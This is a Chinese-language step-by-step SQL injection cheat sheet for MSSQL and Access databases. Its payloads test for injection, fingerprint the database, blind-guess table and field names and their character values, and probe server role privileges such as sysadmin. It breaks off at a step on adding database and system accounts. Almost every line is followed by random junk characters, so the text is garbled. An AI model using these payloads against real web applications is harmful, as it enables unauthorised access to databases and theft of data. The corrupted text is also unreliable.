1.判断是否有注入;and 1=1 ;and 1=2 zMSwU]4I!
2.初步判断是否是mssql ;and user>0 *C_A(n5"V
7:4c\C0
3.注入参数是字符'and [查询条件] and ''=' m$vq%[/#
x-%O1frc
4.搜索时没过滤参数的'and [查询条件] and '%25'=' MBWoPK
LU6R"c11
5.判断数据库系统 \e86'&
(0{Dn5MH
;and (select count(*) from sysobjects)>0 mssql vk7IqlEQ
K[T0);hZR
;and (select count(*) from msysobjects)>0 access VVJ0?G
(?
"~4V(
5rsz2;#p
ufXWK3~\
6.猜数据库 ;and (select Count(*) from [数据库名])>0 "Bd-h|J
9g6$"',H
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 [ V.67_~
L=lSW7R
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9z(SOzZn
}B0[S_mw
9.(1)猜字段的ascii值(access) <"3q5ic/Z
[jgVN w""D
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 hK?GIbRZ
"r^RfZ;
(2)猜字段的ascii值(mssql) a%%7Ew ?
- Jaee,P
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 8"h;+;
EQyX!
10.测试权限结构(mssql) }qWnn>h9xv
S{^x]h|?
|f_'(-v`E
c.>f,vtcn
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >Na. C(DZ
&M|rRd~*
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- /stvNIEa
8a6.77c
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- }?2X
q
\(Ma>E4PNU
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- @X/ 1`Mp
bB<S4@jF8z
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- JD*HG]
OY1bFIE
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- @Ou
H=<YN
Cu@q*:'
;and 1=(select IS_MEMBER('db_owner'));-- , Q0Y} )
?`+VWa[,e
\GEz.Vb
{V7mpVTX.
11.添加mssql和系统的帐户 (wu'FFJp#
Kw-<